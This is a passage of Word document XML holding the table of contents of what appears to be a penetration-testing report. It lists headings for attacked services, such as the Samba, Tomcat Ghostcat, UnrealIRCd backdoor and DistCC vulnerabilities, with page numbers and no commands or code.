          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0165B003" w14:textId="19D3292B" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092370" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 445 Samba</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092370 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="351E040F" w14:textId="66349968" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092371" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Revisit SSH 23</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092371 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B8E8A4A" w14:textId="2BAE8D34" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092372" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Brute force ssh 23</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092372 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="065C323C" w14:textId="64EDBD10" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092373" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Linux udev Netlink Local Privilege Escalation</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092373 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19FFCE76" w14:textId="457AECD5" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092374" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 8180 Tomcat</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092374 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05A05438" w14:textId="5A5691B7" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092375" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 8009 AjP13 NVT: Apache Tomcat AJP RCE Vulnerability (Ghostcat)</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092375 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72CBA987" w14:textId="1469B0CD" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092376" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 5432 postgres</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092376 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A33A14C" w14:textId="3B7DC88C" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092377" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 23 telnet</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092377 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79BFA0D2" w14:textId="3740E5BE" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092378" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 1099 java_rmi</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092378 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47898BAE" w14:textId="4F9057FD" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092379" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 5900 VNC</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092379 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02C06190" w14:textId="1BDE149F" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092380" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 6667, BackDoor v3.2.8.1</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092380 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="296B9280" w14:textId="15FDA410" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092381" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 6697 NVT: UnrealIRCd Authentication Spoong Vulnerability</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092381 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EE01365" w14:textId="312AF956" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092382" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 3632 DistCC RCE Vulnerability (CVE-2004-2687)</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092382 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1554BA79" w14:textId="0EA6EC1A" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092383" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 3306 MySql</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092383 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E8270F2" w14:textId="290B33DF" w:rsidR="000212CA" w:rsidRDefault="00E20F61">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155092384" w:history="1">
        <w:r w:rsidR="000212CA" w:rsidRPr="0064391F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Port 25 SMTP</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155092384 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r w:rsidR="000212CA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10CD22BF" w14:textId="1D33EE93" w:rsidR="00242AF9" w:rsidRPr="00242AF9" w:rsidRDefault="00012388" w:rsidP="00242AF9">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF7CA24" w14:textId="7D42F572" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00050E8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc155092352"/>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
